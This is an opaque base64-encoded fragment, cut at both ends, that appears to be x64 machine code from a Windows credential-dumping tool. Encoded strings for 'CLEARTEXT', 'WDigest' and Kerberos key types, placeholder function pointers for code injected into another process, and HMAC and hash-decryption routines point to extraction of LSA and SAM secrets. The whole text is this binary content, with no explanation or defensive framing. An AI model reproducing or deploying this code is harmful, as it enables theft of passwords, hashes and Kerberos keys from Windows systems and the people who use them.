YQkmAAAAEmNlCTMAAAAx0QkIAEAAADosAAAAOsMSI0NE88BAOhWWv//SYvM/xXNNwEA6wxIjQ2czwEA6D9a//9Ii5QkiAAAAEiLz+gLfv///8U7bCR4D4Lv/f//SIvO/xWaNwEASIuUJIAAAABIi8/o5n3//+sMSI0NCdABAOj8Wf//SIuUJJAAAABIi8/oyH3//+sU/xUUNwEASI0NddABAIvQ6NZZ//9MjZwksAAAAEGLxUmLWzBJi2s4SYvjQV5BXUFcX17DzMzMTIvcSYlbCEmJaxBFiUsgV0FUQVVIgezQAAAATIviSI1EJEAz2zmcJBABAABEjWsQSIlEJDhJjUPQSIv5SI0V2dABAEiJRCQoSI0FvdABAEiNDdbQAQBID0XQSYvoRIlsJDBEiWwkNESJbCQgRIlsJCToPln//zkfD4TVAAAAg38EFA+FywAAAEiNTCRg6A7CAABIjUwkYEWLxUiL1ej4wQAARI1DBEiNlCQIAQAASI1MJGDo4sEAADmcJBABAABIjQWuSgEASI0Vt0oBAESNQwtIjUwkYEgPRdDou8EAAEiNTCRg6KvBAABEix9IjVQkIEiNTCQw80MPb0QjBPMPf0QkQOhiwQAAhcB4O0yNRCRQSI2UJAgBAABIjUwkQOhTwQAAhcAPmcOF23QSSI1MJFBFM8BBi9XoMIf//+sVSI0N988BAOsHSI0NbtABAOhhWP//SI0Njl0BAOhVWP//TI2cJNAAAACLw0mLWyBJi2soSYvjQV1BXF/DzMxMi9xJiVsISYlrEFZXQVRBVUFXSIHs0AAAADP2TIvhSY1DwEEhcyBEjX4QSI0NftABAESJfCRARIl8JEREiXwkUESJfCRUSYv5TYvoSIvqTIlMJEhIiUQkWOjaV///TI2cJBgBAABMjQVb0AEATIlcJDBIIXQkKEghdCQgRTPJSIvVSYvM6J51//+FwA+EBAEAAIuUJBgBAACNTkD/FR41AQBIi9hIhcAPhPQAAABIjYQkGAEAAEyNBQvQAQBFM8lIiUQkMEiL1UmLzEiJXCQoSCF0JCDoTnX//4XAD4SdAAAASI1MJGDoOMAAAEiNU3BIjUwkYEWLx+ghwAAARI1GL0iNFRBJAQBIjUwkYOgMwAAASI1MJGBFi8dJi9Xo/L8AAESNRilIjRUbSQEASI1MJGDo578AAEiNTCRg6Ne/AABIjVQkUEiNTCRA8w9vq4AAAADzD38v6JK/AACFwEAPmcaF9nQQRTPAQYvXSIvP6HyF///rFUiNDVPPAQDrB0iNDcrPAQDorVb//0iLy/8VJDQBAOsMSI0NQ9ABAOiWVv//SI0Nw1sBAOiKVv//TI2cJNAAAACLxkmLWzBJi2s4SYvjQV9BXUFcX17DTIvcSYlbCE2JSyBNiUMYVVZXQVRBVUFWQVdIgezwAAAASINkJGgAuDAAAABJi+iJRCRgiUQkZEmNQ7BIiUQkeEiNRCRISYvZSIlEJChMjQVY0AEAQb0ZAAIARTPJTIv6TIvhRIlsJCDHRCRwEAAAAMdEJHQQAAAAM/8z9uijb///hcAPhGYDAABIi1QkSEiNRCRYTI0FItABAEiJRCQoRTPJSYvMRIlsJCDodW///4XAD4QPAwAASItUJFhIjUQkQEUzyUiJRCQwSI1EJERFM8BIiUQkKEghdCQgSYvMx0QkQAQAAADocXP//4XAD4SDAgAARA+3RCRED7dUJEZIjQ3PzwEA6GJV//9mg3wkRAlIi1QkSEiNBfjPAQBMjQUJ0AEASYvMTA9HwEiNRCRQRTPJSIlEJChEiWwkIOjjbv//hcAPhC0CAABIi1QkUEiNRCRARTPJSIlEJDBIIXQkKEghdCQgRTPASYvM6Oxy//+FwA+E/gEAAItUJEBEjXdAQYvO/xVrMgEASIvoSIXAD4TZAQAASItUJFBIjUQkQEUzyUiJRCQwRTPASYvMSIlsJChIIXQkIOigcv//hcAPhKEBAABmg3wkRAkPhtMAAABMi4wkUAEAAItUJEBFM8BIi83oLRAAAIXAD4R2AQAAi1U8QYvO/xX5MQEASIv4SIXAD4ReAQAARItFPEiNVUxIi8jos8cAAItXGEiNDTvPAQDoRlT//0iNTwToOYT//0iNDWpZAQDoMVT//0Uz7UUz9jl3GA+GGwEAAEiNDUPPAQBBi9VJjVw+HOgOVP//SIvL6AKE//9IjQ07zwEA6PpT//+LUxRIjUsYRTPA6KOC//9IjQ0YWQEA6N9T//+LQxRB/8VFjXQGGEQ7bxhyrOm6AAAASI2MJIAAAADoqLwAAEiLlCRQAQAASI2MJIAAAABBuBAAAADoh7wAALvoAwAASI1VPEiNjCSAAAAAQbgQAAAA6Gu8AABIg+sBdeNIjYwkgAAAAOhSvAAATI1dDEiNVCRwSI1MJGBMiVwkaOgQvAAAhcB4R7sQAAAAQYvOSIvT/xXNMAEASIvwSIXAdC7zD29FHEiNDXHOAQDzD38A6ChT//9FM8CL00iLzujTgf//SI0NSFgBAOgPU///SIucJEgBAABIi83/FX4wAQBIi6wkQAEAAEiLVCRYSYvM6MV2//9Ihf91BUiF9nQ5g7wkWAEAAABIi1QkSEmLzHQXTIvLTIvFSIl0JChIiXwkIOhYAAAA6xBMi89Ni8dIiXQkIOjyAwAASItUJEhJi8zodXb//0iF/3QJSIvP/xULMAEASIX2dAlIi87/Ff0vAQAzwEiLnCQwAQAASIHE8AAAAEFfQV5BXUFcX15dw0iLxEiJWAhIiWgQSIlwGFdBVEFVSIHswAAAAEiNQLhJi/BJi/lIiUQkKEyNBYfNAQBBvRkAAgBFM8lIi9lEiWwkIOjRa///RTPkQTvED4Q6AwAATI2EJLAAAABIi9dIi87oFvD//0E7xA+EDgMAAEiLlCSwAAAASI2EJKgAAABMjQVCzQEASIlEJChFM8lIi85EiWwkIOh9a///QTvED4TJAgAASIuUJJAAAABMiWQkYEyJZCRYTIlkJFBMiWQkSEyJZCRATIlkJDhIjUQkcEUzyUiJRCQwSI2EJIgAAABFM8BIiUQkKEiLy0yJZCQg6Lht//9BO8QPhGACAACLRCRwQY1MJED/wIlEJHCNUAFIA9L/FdAuAQBIi/hJO8QPhDkCAABBi+xEOaQkiAAAAA+GHwIAAItMJHBIi5QkkAAAAEyJZCRATIlkJDhIjYQkoAAAAImMJKAAAABMiWQkMEiLy0yLz0SLxUyJZCQoSIlEJCDo/XD//0E7xA+ExQEAAEiNDVnMAQBIi9fo0VD//0iNFWrMAQBBuAQAAABIi8//FRsxAQBBO8R1FEiLlCSoAAAATI1HCEiLzug+CAAASIuUJJAAAABIjYQkmAAAAEUzyUiJRCQoTIvHSIvLRIlsJCDoMmr//0E7xA+ESgEAAEiLlCSYAAAASI2EJIAAAABMjQUKzAEASIlEJChFM8lIi8tEiWwkIOj9af//QTvEdGxMi4wkCAEAAEyLhCQAAQAASIuUJIAAAABIjUQkdEiLy0iJRCQoSI1EJHhIiUQkIOiUCAAAQTvEdCNIi1QkeItMJHRMjQW3ywEATIvP6JcKAABIi0wkeP8VZC0BAEiLlCSAAAAASIvL6LBz//9Ii5QkmAAAAEiNhCSAAAAATI0FjcsBAEiJRCQoRTPJSIvLRIlsJCDoYGn//0E7xHRsTIuMJAgBAABMi4QkAAEAAEiLlCSAAAAASI1EJHRIi8tIiUQkKEiNRCR4SIlEJCDo9wcAAEE7xHQjSItUJHiLTCR0TI0FOssBAEyLz+j6CQAASItMJHj/FccsAQBIi5QkgAAAAEiLy+gTc///SIuUJJgAAABIi8voA3P//0iNDVRUAQDoG0/////FO6wkiAAAAA+C4f3//0iLz/8VgywBAEiLlCSoAAAASIvO6M9y//9Ii5QksAAAAEiLzui/cv//SIuUJJAAAABIi8vor3L//0yNnCTAAAAAM8BJi1sgSYtrKEmLczBJi+NBXUFcX8NIi8RIiVgISIloEEiJcBhXQVRBVUFWQVdIgewQAQAARTP/TIvhSYv4QY13EEiL2kiNSIQz0kyLxk2L8caAeP///wjGgHn///8CZkSJuHr////HgHz///8OZgAAiXCA6LXBAABIjYQk+AAAAIm0JNAAAACJtCTUAAAASImEJNgAAABIjYQkoAAAAEyNBRTKAQBIiUQkKL4ZAAIARTPJSIvTSYvMiXQkIOjAZ///QTvHD4TyBAAATIuMJGABAABIi5QkoAAAAEiNhCSUAAAASIlEJChIjYQk4AAAAE2LxkmLzEiJRCQg6FIGAABBO8cPhKQEAABIjYQkiAAAAEyNBdLJAQBFM8lIiUQkKEiL10mLzIl0JCDoU2f//0yLrCTgAAAAQTvHD4RkBAAATTv3D4SLAAAASI0NrlIBAOh1Tf//SIuUJIgAAABMjZwkgAAAAEyJXCQwSI1EJHBMjQWEyQEASIlEJChFM8lJi8xMiXwkIOgva///QTvHdDiLVCRwSI0Nh8kBAIvCRIvCJQD8//9BweAKgfoAKAAARA9HwOgSTf//RDl8JHB1FUiNDcTJAQDrB0iNDePJAQDo9kz//0iLlCSIAAAATIl8JGBMiXwkWEiNRCR8RTPJRTPASIlEJFBIjUQkeEmLzEiJRCRISI2EJIQAAABIiUQkQEyJfCQ4TIl8JDBMiXwkKEyJfCQg6O1o//9BO8cPhGIDAACLRCR4u0AAAAD/wIvLjVABiUQkeEgD0v8VAyoBAEiL6Ek7xw+EOQMAAItUJHyLy/8V6ykBAEiL2Ek7xw+EGAMAAEGL14lUJHBEObwkhAAAAA+G+gIAAItEJHyLTCR4RIvCSIuUJIgAAACJRCR0SI1EJHRIiUQkQEiJXCQ4SI2EJJAAAACJjCSQAAAATIl8JDBMi81Ji8xMiXwkKEiJRCQg6KNt//9BO8cPhIsCAABIjRUbyQEAQbgKAAAASIvN/xU0LAEAQTvHD4RsAgAASI0V9McBAEG4EQAAAEiLzf8VFSwBAEE7xw+ETQIAAPZDMAEPhEMCAABIjQ3ryAEASIvV6JNL//9IjUsg6Mp6//+LUxBIjQ3gyAEARIvC6HhL//9NO/cPhJEBAACBPZW0AgC4CwAA80EPb0UASI0FwH0BAEyNBRl9AQBIjYwkqAAAAMdEJCAAAADw8w9/hCS8AAAATA9CwDPSRI1KGP8VYCUBAEE7xw+EwAEAAEiLjCSoAAAARTPJSI2EJJgAAABIiUQkKEWNQRxIjZQksAAAAESJfCQg/xXIJQEAQTvHD4TjAAAASIuMJJgAAABFM8lMjUNAQY1RAf8VjiUBAESL2EE7xw+EmgAAAA+3Ew+3SwKLRCR0RIvCA9GDwKBB0ehBg+ABQo10QkiLzoPhDwPxO/APh4AAAABBi/87/nNFi8dFM8lFM8BIjUwYYEiNhCSAAAAAM9JIiUQkKEiJTCQgSIuMJJgAAADHhCSAAAAAEAAAAP8VQyUBAIPHEESL2EE7x3W3RTvfdAyyMkiLy+hVAQAA6yP/FWEnAQBIjQ3CxwEA6w3/FVInAQBIjQ1DyAEAi9DoFEr//0iLjCSYAAAA/xVmJAEA6xT/FS4nAQBIjQ2vyAEAi9Do8En//0iLjCSoAAAAM9L/FSgkAQDrf4uUJJQAAABIjYQk+AAAAEyNQ0BBuRAAAABJi81IiUQkIOj0BwAARItcJHRIjUNgQYPDoEiNlCTQAAAASI2MJOgAAABEiZwk7AAAAESJnCToAAAASImEJPAAAADoNLIAAEE7x3wMsjFIi8voiwAAAOsOSI0NrsgBAIvQ6F9J//+LVCRw/8KJVCRwO5QkhAAAAA+CBv3//0iLy/8VvyYBAEiLzf8VtiYBAEiLlCSIAAAASYvM6AJt//9Ji83/FZ0mAQBIi5QkoAAAAEmLzOjpbP//TI2cJBABAAC4AQAAAEmLWzBJi2s4SYtzQEmL40FfQV5BXUFcX8PMzMxIiVwkCFdIg+wwRA+3AQ++2g+3UQJNi8hMjZGoAAAASIv5SdHpSNHqTIlUJCBJi8GD4AFNjYRAqAAAAEwDwUiNDX/IAQDomkj//0iNDaPIAQCL0+iMSP//RTPASI1PYEGNUBDoNHf//0iNDalNAQBIi1wkQEiDxDBf6WZI///MzEyL3EmJWwhJiXMQV0iD7FBJjUPoRTPJSYvwSYlD0MdEJCAZAAIASIv56O5h//+FwA+EpAAAAEiLVCRASI1EJHhMjQVNyAEASIlEJDBIg2QkKABIg2QkIABFM8lIi8/o8WX//4XAdGaLVCR4uUAAAABIg8IC/xVyJQEASIvYSIXAdEtIi1QkQEiNRCR4TI0FAcgBAEiJRCQwRTPJSIvPSIlcJChIg2QkIADopmX//4XAdBJIjQ3zxwEATIvDSIvW6KBH//9Ii8v/FRclAQBIi1QkQEiLz+hma///SItcJGBIi3QkaEiDxFBfw8zMTIvcSYlbCEmJaxBJiXMYV0FUQVVIgeyAAAAAM9tJi+lJi/CNQxCJXCRIiVwkTIlEJFiJRCRcSY1DqEmJQ5hJiVuQRTPJRTPASYlbiEyL4kyL6YlcJEBJiVu4SYlbyOgFZf//O8MPhJQBAAA5XCRAD4SKAQAAi1QkQI1LQP8VfiQBAEiL+Eg7ww+EcQEAAEiNRCRARTPJRTPASIlEJDBJi9RJi81IiXwkKEiJXCQg6LVk//87ww+ELwEAAEg783Rdi1QkQEUzyUyLxkiLz+hOAgAAO8MPhBwBAACLVzxIi7QkyAAAAI1LQIkW/xUQJAEASIuMJMAAAABIiQFIO8MPhPIAAABEiwZIjVdMSIvIuwEAAADovrkAAOnZAAAASDvrD4TQAAAAi0wkQEiJbCRgiwdIK8hMjUQkSEiNVCRYSAPPiUQkbIlEJGhIiUwkcEiNTCRo6NyuAAA9IwAAwA+FkwAAAItUJEi5QAAAAP8VjiMBAEiJRCRQSDvDdHqLRCRITI1EJEhIjVQkWEiNTCRoiUQkTOicrgAAO8N8QYtEJEhIi7QkyAAAALlAAAAASIvQiQb/FUgjAQBIi4wkwAAAAEiJAUg7w3QVRIsGSItUJFBIi8i7AQAAAOj5uAAASItMJFD/FRAjAQDrDEiNDR/GAQDogkX//0iLz/8V+SIBAEyNnCSAAAAAi8NJi1sgSYtrKEmLczBJi+NBXUFcX8PMzIXJD4T1AAAASIlcJAhIiXQkEFdIgeygAAAAi9lmiUwkIGaJTCQiSIv6SIlUJChIjQ1jSgEASYvQSYvx6BhF//9IjRVZxgEASIvO/xV4JQEAhcB1UEiNDWXGAQDo+ET//0iNTCQw6F6uAABIjUwkMESLw0iL1+hCrgAASI1MJDDoPq4AAEUzwEiNjCSIAAAAQY1QEOh4c///SI0NLcYBAOi0RP//gfv//wAAdyFIjUwkIOhKcf//hcB0E0iNVCQgSI0NCsYBAOiNRP//6xxIjQ0UxgEA6H9E//9BuAEAAACL00iLz+gnc///TI2cJKAAAABJi1sQSYtzGEmL41/DzMxIi8RIiVgISIloEEiJcCBXQVRBVUiB7IAAAABFM+1Ji/BIi+lEi+JIjUi8RY1FIDPSSYvZQYv9xkCwCMZAsQJmRIlossdAtBBmAADHQLggAAAA6GW3AABJO/V0XUWLzUWL1UQ5bhgPhgYCAABMi0UEQYvCSI1MMBxMOwF1D0yLRQxMO0EIdQVBi8XrBRvAg9j/QTvFi0EUdBNB/8FFjVQCGEQ7ThhyxenGAQAASI1ZGImEJLAAAADrFEk73Q+EsAEAAMeEJLAAAAAQAAAASTvdD4ScAQAAgT2orAIAuAsAAEiNBdl1AQBMjQUydQEATA9CwDPSSI1MJDhEjUoYx0QkIAAAAPD/FYUdAQBBO8UPhF4BAABIi0wkOEiNRCQwRTPJRTPAugyAAABIiUQkIP8VDB4BAEE7xQ+EKAEAAESLhCSwAAAASItMJDBFM8lIi9P/FQoeAQC76AMAAEiLTCQwRTPJSI1VHEWNQSD/Fe8dAQBIg+sBdeRIi0wkMEyNTCRQTI1EJFSNUwJEiWwkIP8VfB0BAIv4QTvFD4S7AAAAQYvdjUs8QTvMD4OsAAAASItMJDhFM8lIjUQkQEiJRCQoRY1BLEiNVCRIRIlsJCD/FVwdAQCL+EE7xXRfi8NFM8lFM8BIjUwoPEiNhCSwAAAAM9JIiUQkKEiJTCQgSItMJEDHhCSwAAAAEAAAAP8VNh0BAIv4QTvFdRT/FWkfAQBIjQ3awwEAi9DoK0L//0iLTCRA/xWAHAEA6xT/FUgfAQBIjQ05xAEAi9DoCkL//4PDEEE7/Q+FSP///0iLTCQw/xXrHAEASItMJDgz0v8VLhwBAEyNnCSAAAAAi8dJi1sgSYtrKEmLczhJi+NBXUFcX8PMzMxIi8RIiVgISIloEEiJcBhIiXggQVRIgewgAQAAM/ZIi/lJi+iL2kSNZjxIjYh8////M9JNi8SJsHj////o57QAAEiNjCTkAAAATYvEM9KJtCTgAAAA6M60AABEjWZASI2MJKAAAABBO9xIi9dBD0fcTIvD6Kq0AABIjYwk4AAAAEyLw0iL1+iXtAAAjV4QSIvDgbQ0oAAAADY2NjaBtDTgAAAAXFxcXEiDxgRIg+gBdeBIjUwkMOj1qQAASI2UJKAAAABIjUwkMEWLxOjaqQAASI1MJDBEi8NIi9XoyqkAAEiNTCQw6LqpAABIjUwkMPMPb6wkiAAAAPMPf2wkIOitqQAASI2UJOAAAABIjUwkMEWLxOiSqQAASI1UJCBIjUwkMESLw+iAqQAASI1MJDDocKkAAEiLhCRQAQAATI2cJCABAADzD2+sJIgAAADzD38oSYtbEEmLaxhJi3MgSYt7KEmL40Fcw8xMi9xJiVsIVVZXQVRBVUFWQVdIgewAAwAARTP/SI01eagBAEmNg3j9//9JiYOg/f//SY2DeP3//0SL6UmJg5D9//9IjQWzwgEASI0NNKgBAEmJg9D9//9IuEFBQUFBQUFBSYmLqP7//0mJg9j9//9IjQWWwgEASYmLyP7//0mJg/D9//9IuEJCQkJCQkJCSI0Nt6cBAEmJg/j9//9IjQV5wgEATIviSYmDEP7//0i4Q0NDQ0NDQ0NNibtY/f//SYmDGP7//0iNBXDCAQBFibtQ/f//SYmDMP7//0i4RERERERERERMiXwkeEmJgzj+//9IjQVVwgEATYm7aP3//0mJg1D+//9IuEVFRUVFRUVFTIl8JHBJiYNY/v//SI0FOsIBAE2Ju0j9//9JiYNw/v//SLhGRkZGRkZGRkyJfCRoSYmDeP7//0iNBS/CAQBJi/9JiYOQ/v//SLhHR0dHR0dHR0yJfCRYSYmDmP7//0iNBSjCAQBFibt4/f//SYmDsP7//0i4SEhISEhISEhNibuA/f//SYmDuP7//0iNBSPCAQBNibuY/f//SYmD0P7//0i4SUlJSUlJSUlNibuI/f//SYmD2P7//0iNBR7CAQBJi+9JibPI/f//TYm74P3//0mJs+j9//9JiYPw/v//TYm7AP7//0mJswj+//9Nibsg/v//SYmzKP7//02Ju0D+//9JibNI/v//TYm7YP7//0mJs2j+//9NibuA/v//SYmziP7//02Ju6D+//9NibvA/v//TYm74P7//0mJi+j+//9IuEpKSkpKSkpKx4Qk4AAAAAwAAABNibsA////SYmD+P7//0iNBYPBAQBJiYsI////SYmDEP///0i4S0tLS0tLS0tNibsg////SYmDGP///0iNBcalAQBNibtA////SYmDKP///0iNBU3BAQBJiYMw////SLhMTExMTExMTEmJgzj///9JjYPI/f//SYmDsP3//0Q5PQikAgAPhfgBAABMjQUfwQEARTPJQYvNTIl8JCDo023//0E7xw+ESgEAAIsVeKYCAEmL30iNBeaWAgBJi885EHcUSIPBUEiL2EiDwFBIgfnwAAAAcuhJO98PhAoBAABIi0MQSI1MJFi6OAQAAEiJhCTQAAAASItDIEiJhCTAAAAA6BMFAABIi3wkWEE7xw+EyQAAAEyNhCSQAgAASIvWSIvP6KpK//9BO8cPhJkAAACLhCSgAgAAi0sY8w9vhCSQAgAARItDCEyJfCRITIlkJEDzD3+EJLACAABIiYQkwAIAAEiNBTT8//9EiWwkOEiJRCQwi0MoTI2MJMAAAACJRCQoSIlMJCBIjZQk0AAAAEiNjCSwAgAAvgEAAACJNeuiAgDoxj3//0E7x3UU/xV3GQEASI0NCMABAIvQ6Dk8//9EiT3GogIA6xT/FVoZAQBIjQ1bwAEAi9DoHDz//4ucJFADAADp9AMAAIucJFADAADpBwQAAEQ5PZGiAgAPhYEAAABMjQXgwAEARTPJSYvUQYvNTIl8JCDoWWz//0E7x3RiSI1MJFi6OgQAAOjpAwAASIt8JFhBO8d0SUiNjCSAAgAATI0F4A8AAEiNFZUJAABIiUwkIEyNjCTgAAAASIvPRCvC6Blk//9BO8d0CkiNrCSAAgAA6wxIjQ2DwAEA6HY7//8z0kiNjCTQAgAARI1CMOjHrgAAvgEAAABMjYwkqAAAAEiNlCTQAgAARIvGM8no4qMAAEE7xw+MCQMAAEiLjCSoAAAATI1EJGCNVgTovqMAAEE7xw+M1QIAAEiNlCSYAAAARTPJQbg/AA8AM8noJ6QAAEE7x4vYD4yYAgAATItEJGBIi4wkmAAAAEyNTCRQTYtAELoFBwAA6PajAABBO8eL2A+MUAIAAEiLVCRgSI0Nc8ABAOi+Ov//SItMJGBIi0kQ6OBq//9IjQ3dPwEA6KQ6//9MjUwkeEyNBYBVAQBJi9RBi81MiXwkIOgEa///QTvHD4SaAAAASItMJHhFM8Az0v8VvxoBAImEJFADAABBO8d0aEiLTCRQSI1EJGhMjUwkcEyNhCRQAwAAi9ZIiUQkIOhWowAAQTvHi9h8MkyLRCRwi5QkUAMAAEiLTCRQTIvN6BADAABIi0wkcOgUowAASItMJGjoCqMAAOl8AQAASI0N2L8BAOmzAAAASItUJHhIjQ03wAEA6Oo5///pWgEAAEyNjCSgAAAATI0FhsABAEmL1EGLzUyJfCQg6EJq//9BO8cPhIEAAABIi5QkoAAAAEiNjCTwAAAA6CqjAABIi0wkUEyNXCRoTI2MJIAAAABMjYQk8AAAAIvWTIlcJCDokqIAAEE7x4vYfCxIi4QkgAAAAEiLTCRQTI2EJPAAAACLEEyLzehMAgAASIuMJIAAAADpNP///0iNDRDAAQCL0OhBOf//6bEAAABIi0wkUEiNhCRYAwAATI2MJJAAAABIiUQkKEiNlCSIAAAARTPAx0QkIGQAAADoDqIAAEE7x0SL4H0XPQUBAAB0EEiNDSzAAQCL0OjtOP//61NFi+9EObwkWAMAAHY5TYv3QYvFTIvNSI0MQEiLhCSQAAAAQYsUBkyNRMgISItMJFDopgEAAEQD7kmDxhhEO6wkWAMAAHLKSIuMJJAAAADolqEAAEGB/AUBAAAPhE////9Ii0wkUOh5oQAA6w5IjQ0wwAEAi9DocTj//0iLjCSYAAAA6FyhAADrDkiNDXPAAQCL0OhUOP//SItMJGDoEqEAAOsHi5wkUAMAAEiLjCSoAAAA6NigAADrB4ucJFADAABJO+90CjPSSIvN6AAz//9JO/90GkiLTwhMOTl0CUiLCf8VTRUBAEiLz+i5Lf//i8NIi5wkQAMAAEiBxAADAABBX0FeQV1BXF9eXcNIiVwkCEiJdCQQV0iD7FCL+kiL8TPbSI0VkzwBAESNQwEzyf8VjxEBAEiFwHQWSI1UJCBIjQ0WwAEATIvA6OZh///rAjPAhcB0XUSLRCQ8M9KLz/8VvxQBAEiL+EiFwHQ3uhAAAACNSjD/FfkUAQBIiQZIhcB0EkyLxkiL17kBAAAA6Dks//+L2IXbdS5Ii8//FZIUAQDrI/8VchQBAEiNDcO/AQDrDf8VYxQBAEiNDTTAAQCL0OglN///SIt0JGiLw0iLXCRgSIPEUF/DzMzMSIlcJAhIiWwkEEiJdCQYV0iD7FBIi/lJi+lNi8hIjQ2UwAEARIvCi9ro4jb//0iF7Q+FwQAAAEyNTCQgRIvDuhsDAABIi8/ozp8AAIXAD4iUAAAASItMJCBMjUQkeI1VEuicnwAAhcB4YUiNDYfAAQDomjb//0iLTCR4QDhpIXQPjVUQSIPBEEUzwOg4Zf//SI0NccABAOh0Nv//SItMJHiAeSAAdAxFM8BBjVAQ6BVl//9IjQ2KOwEA6FE2//9Ii0wkeOhFnwAA6w5IjQ1WwAEAi9DoNzb//0iLTCQg6CWfAADpjAAAAEiNDbnAAQCL0OgaNv//63y6EAAAAI1KMP8VkhMBAEiL8EiFwHRmSIMgAEyNRCQoSIvQSIvNiVgI6INa//+FwHRCSItcJEBIhdt0ODPtOSt2KUiNexCDPwB0FkSLR/xFhcB0DYsXi0/4SAPT6DQAAAD/xUiDxxA7K3LbSIvL/xUlEwEASIvO/xUcEwEASItcJGBIi2wkaEiLdCRwSIPEUF/DzMzMSIlcJAhIiWwkEEiJdCQYV0iD7CBBi+hIi/qL2YP5BXMNSI0VFJACAEiLFNrrB0iNFU/AAQBIjQ1YwAEA6EM1//8z9jveD4RbAQAAg+sBD4Q7AQAAg+sBD4TnAAAAg+sBD4SQAAAAg/sBdAtEjUYBi9XpawEAAESLRxAPt1cMRItPFEiNDfPAAQBMA8dI0ero8DT//0QPt0cESI1XGEyNDaDAAQBIi8/oEAIAAEQPt0cGTI0NNMEBAEiL0EiLz+j5AQAARA+3RwhMjQ2NwAEASIvQSIvP6OIBAABED7dHCkyNDS7BAQBIi9BIi8/oywEAAOn/AAAARItHDA+3VwhIjQ0HwAEATAPHSNHq6HQ0//9ED7dHBEiNVxBMjQ0kwAEASIvP6OQAAABED7dHBkyNDSjAAQBIi9BIi8/ozQAAAOmxAAAAQDh3Aw+GpwAAAI1eAUiNDZy/AQCL0+glNP//RTPAi85I/8FBjVAQSMHhBEgDz+jFYv//SI0NOjkBAOgBNP//D7ZHA4vzO9hywetmSIvVSI0NQ78BAEyLx0jR6ujgM///609IjQ33vgEA6NIz//9AOHchdBBFM8BIjU8QQY1QEOh0Yv//SI0N7b4BAOiwM///QDh3IHQPRTPAQY1QEEiLz+hTYv//SI0NyDgBAOiPM///SItcJDBIi2wkOEiLdCRASIPEIF/DzMxIi8RIiVgISIloEEiJcBhIiXggQVRIg+wgM/ZBD7fYSIv6TIvhZkQ7xnRdTDvOdA9IjQ35vwEASYvR6Dkz//9mO/NzREiNdwwPt+uLTvzohZn//0iNDea/AQBIi9DoFjP//4tOBIsWSQPMRTPA6L5h//9IjQ0zOAEA6Poy//9Ig8YUSIPtAXXDSItsJDhIi3QkQA+3w0iLXCQwSI0MgEiNBI9Ii3wkSEiDxCBBXMPMzEiLxEiJWAhIiWgQSIlwGEiJeCBBVEiD7CAz9kEPt9hIi/pMi+FmRDvGdGFMO850D0iNDUm/AQBJi9HoiTL//2Y783NISI13EA+364tO/OjVmP//RItHCEiNDUq/AQBIi9DoYjL//4tOBIsWSQPMRTPA6Aph//9IjQ1/NwEA6EYy//9Ig8YYSIPtAXW/SItsJDhIi3QkQA+3w0iLXCQwSI0MQEiNBM9Ii3wkSEiDxCBBXMPMzEiJTCQIV0iB7PABAADHhCTYAQAAAAAAAMdEJDBDAEwAx0QkNEUAQQDHRCQ4UgBUAMdEJDxFAFgAx0QkQFQAAABIjXwkRDPAuRQAAADzqsdEJFhXAEQAx0QkXGkAZwDHRCRgZQBzAMdEJGR0AAAASI18JGgzwLkYAAAA86rHhCSAAAAASwBlAMeEJIQAAAByAGIAx4QkiAAAAGUAcgDHhCSMAAAAbwBzAMeEJJAAAAAAAAAASI28JJQAAAAzwLkUAAAA86rHhCSoAAAASwBlAMeEJKwAAAByAGIAx4QksAAAAGUAcgDHhCS0AAAAbwBzAMeEJLgAAAAtAE4Ax4QkvAAAAGUAdwDHhCTAAAAAZQByAMeEJMQAAAAtAEsAx4QkyAAAAGUAeQDHhCTMAAAAcwAAALgSAAAAZomEJJABAAC4EgAAAGaJhCSSAQAASI1EJDBIiYQkmAEAALgOAAAAZomEJKABAAC4DgAAAGaJhCSiAQAASI1EJFhIiYQkqAEAALgQAAAAZomEJLABAAC4EAAAAGaJhCSyAQAASI2EJIAAAABIiYQkuAEAALgmAAAAZomEJMABAAC4JgAAAGaJhCTCAQAASI2EJKgAAABIiYQkyAEAAEGxAUG4AAAAEEiNlCR4AQAAM8lIuEFBQUFBQUFB/9CFwA+MPQQAAEiNlCTQAQAAuQUAAABIuEhISEhISEhI/9CFwA+MCAQAAEyNjCRwAQAATIuEJNABAABNi0AQugAAABBIi4wkeAEAAEi4RERERERERET/0IXAD4y6AwAATI2MJIABAABIi4QkAAIAAESLQCi6AAAAEEiLjCRwAQAASLhFRUVFRUVFRf/QhcAPjHEDAADHRCQgAAAAAOsLi0QkIIPAAYlEJCCDfCQgBQ+DWAEAAItEJCBIa8AgSMeEBOgAAAAAAAAAi0QkIEhrwCDHhATUAAAAAAAAAItMJCBIa8kgi0QkIImEDNAAAACLRCQgSGvAIMeEBOAAAACAAAAAg3wkIAB0XItEJCBIa8AgTI2MBNQAAACLRCQgSGvAIEyNhAToAAAAi0QkIIPoAYvASGvAEEiNlASQAQAASIuMJIABAABIuENDQ0NDQ0ND/9CL0ItEJCBIa8AgiZQE4AAAAOtNi0QkIEhrwCDHhATUAAAAJAAAAItEJCBIa8AgTI2EBOgAAAC6EgAAAEiLjCSAAQAASLhGRkZGRkZGRv/Qi9CLRCQgSGvAIImUBOAAAACLRCQgSGvAIIO8BOAAAAAAfESLRCQgSGvAIEiDvAToAAAAAHQxi0QkIEhrwCCDvATUAAAAAHQfi0QkIEhrwCCLjATUAAAAi4Qk2AEAAAPBiYQk2AEAAOmS/v//i4wk2AEAAEiDwVhIi4QkAAIAAIlIEEiLhCQAAgAAi1AQQbkEAAAAQbgAMAAAM8lIuEpKSkpKSkpK/9BIi9BIi4QkAAIAAEiJUBhIi4QkAAIAAEiDeBgAD4SIAQAAx4Qk2AEAAAAAAABIi4QkAAIAAEiLQBjHAAUAAADHRCQgAAAAAOsLi0QkIIPAAYlEJCCDfCQgBQ+DSwEAAItEJCBIa8Agg7wE4AAAAAAPjDABAACLRCQgSGvAIEiDvAToAAAAAA+E0wAAAItEJCBIa8Agg7wE1AAAAAAPhL0AAACLjCTYAQAASIPBWItEJCBIa8AgiYwE2AAAAItEJCBIa8Ag8w9vhATQAAAA8w9/hCTgAQAASIuMJAACAABIi0kYi0QkIEhrwBDzD2+EJOABAADzD39EAQiLRCQgSGvAIESLhATUAAAAi1QkIEhr0iCLRCQgSGvAIIuMBNgAAABIi4QkAAIAAEgDSBhIi5QU6AAAAEi4TExMTExMTEz/0ItEJCBIa8Agi4wE1AAAAIuEJNgBAAADwYmEJNgBAACDfCQgAHQei0wkIEhrySBIi4wM6AAAAEi4S0tLS0tLS0v/0Oshi0wkIEhrySC6EgAAAEiLjAzoAAAASLhHR0dHR0dHR//Q6Z/+//9IjYwkgAEAAEi4QkJCQkJCQkL/0EiNjCRwAQAASLhCQkJCQkJCQv/QS